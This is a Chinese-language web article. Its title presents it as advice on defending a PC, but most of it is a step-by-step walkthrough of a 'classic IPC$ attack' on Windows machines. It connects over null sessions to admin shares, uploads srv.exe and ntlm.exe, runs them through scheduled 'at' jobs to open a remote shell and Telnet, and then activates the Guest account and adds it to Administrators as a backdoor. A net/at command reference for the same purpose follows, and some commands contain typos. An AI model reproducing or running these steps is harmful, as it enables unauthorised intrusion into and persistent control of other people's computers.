電腦被攻擊了怎麼辦（個人電腦如何防禦攻擊）

在電影中，黑客總是在滿屏程式碼的操作介面操控攻擊電腦，很是炫酷，我們也可以使用簡單的CMD命令對電腦進行安全測試，不僅有逼格還很實用，快來一起學習學習吧！

一 相關命令

建立空連線:

net use //IP/ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)

建立非空連線:

net use //IP/ipc$ "使用者名稱" /user:"密碼" (同樣有3個空格)

對映預設共享:

net use z: //IP/c$ "密碼" /user:"使用者名稱" (即可將對方的c盤對映為自己的z盤，其他盤類推)

如果已經和目標建立了ipc$，則可以直接用IP 碟符 $訪問,具體命令 net use z: //IP/c$

刪除一個ipc$連線

net use //IP/ipc$ /del

刪除共享對映

net use c: /del 刪除對映的c盤，其他盤類推

net use * /del 刪除全部,會有提示要求按y確認

提示:對於不熟悉命令列操作的朋友來說.建立ipc$連線後,可以在"我的電腦"或"網路上的芳鄰"右鍵對映網路驅動器,效果一樣.

二 經典攻擊模式

1. C:/>net use //127.0.0.1/IPC$ "" /user:"admintitrators"

這是用《流光》掃到的使用者名稱是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連線，因為密碼為"空"，所以第一個引號處就不用輸入，後面一個雙引號裡的是使用者名稱，輸入administrators，命令即可成功完成。

2. C:/>copy srv.exe //127.0.0.1/admin$

先複製srv.exe上去，在流光的Tools目錄下就有（這裡的$是指admin使用者的c:/winnt/system32/，大家還可以使用c$、d$，意思是C盤與D盤，這看你要複製到什麼地方去了）。

3. C:/>net time //127.0.0.1

查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。

4. C:/>at //127.0.0.1 11:05 srv.exe

用at命令啟動srv.exe吧（這裡設定的時間要比主機時間快，不然你怎麼啟動啊，呵呵！）

5. C:/>net time //127.0.0.1

再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令。

6. C:/>telnet 127.0.0.1 99

這裡會用到Telnet命令吧，注意埠是99。Telnet預設的是23埠，但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。

雖然我們可以Telnet上去了，但是SRV是一次性的，下次登入還要再啟用！所以我們打算建立一個Telnet服務！這就要用到ntlm了

7.C:/>copy ntlm.exe //127.0.0.1/admin$

用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。

8. C:/WINNT/system32>ntlm

輸入ntlm啟動（這裡的C:/WINNT/system32>指的是對方計算機，執行ntlm其實是讓這個程式在對方計算機上執行）。當出現"DONE"的時候，就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務！

9.Telnet 127.0.0.1，接著輸入使用者名稱與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然後你想做什麼?想做什麼就做什麼吧,哈哈)

為了以防萬一,我們再把guest啟用加到管理組

10. C:/>net user guest /active:yes

將對方的Guest使用者啟用

11. C:/>net user guest 1234

將Guest的密碼改為1234,或者你要設定的密碼

12. C:/>net localgroup administrators guest /add

將Guest變為Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這臺計算機).

ipc$經典攻擊步驟：

1、net use //ip/ipc$ 密碼 /user:使用者名稱

2、copy 檔名 //ip/c$

3、net time //ip

4、at //ip 時間 命令

5、攻擊成功，連線你的肉雞

常用的網路命令

net user 檢視使用者列表

net user 使用者名稱 密碼 /add 新增使用者

net user 使用者名稱 密碼 更改使用者密碼

net localgroup administrators 使用者名稱 /add 新增使用者到管理組

net user 使用者名稱 /delete 刪除使用者

net user 使用者名稱 檢視使用者的基本情況

net user 使用者名稱 /active:no 禁用該使用者

net user 使用者名稱 /active:yes 啟用該使用者

net share 檢視計算機IPC$共享資源

net share 共享名 檢視該共享的情況

net share 共享名=路徑 設定共享。例如 net share c$=c:

net share 共享名 /delete 刪除IPC$共享

net stop lanmanserver 關閉ipc$和預設共享依賴的服務

net use 檢視IPC$連線情況

net use //ip/ipc$ "密碼" /user:"使用者名稱" ipc$連線

net use //ip/ipc$ /del 刪除一個連線

net use z: //目標IP/c$ "密碼" /user:"使用者名稱" 將對方的c盤對映為自己的z盤

net use z: /del

net time //ip 檢視遠端計算機上的時間

copy 路徑:/檔名 //ip/共享名複製檔案到已經ipc$連線的計算機上

net view ip 檢視計算機上的共享資源

at 檢視自己計算機上的計劃作業

at //ip 檢視遠端計算機上的計劃作業

at //ip 時間 命令(注意加碟符) 在遠端計算機上加一個作業

at //ip 計劃作業ID /delete 刪除遠端計算機上的一個計劃作業

at //ip all /delete 刪除遠端計算機上的全部計劃作業

at //ip time "echo 5 > c:/t.txt" 在遠端計算機上建立文字檔案t.txt；

下面純手打，上面是度娘給的

taskkill /im 程序名 停止執行

tasklisy 檢視執行程序

ipconfig 檢視本機IP

md 建立資料夾

rd 刪除資料夾

echo off > .txt|exit 新增文字

echo 內容 >> .txt 給文字新增內容

copy 複製檔案

net user 使用者名稱 密碼/add 建立一個普通賬號

net localgroup administrators 使用者名稱 /add 把賬戶加入超級使用者組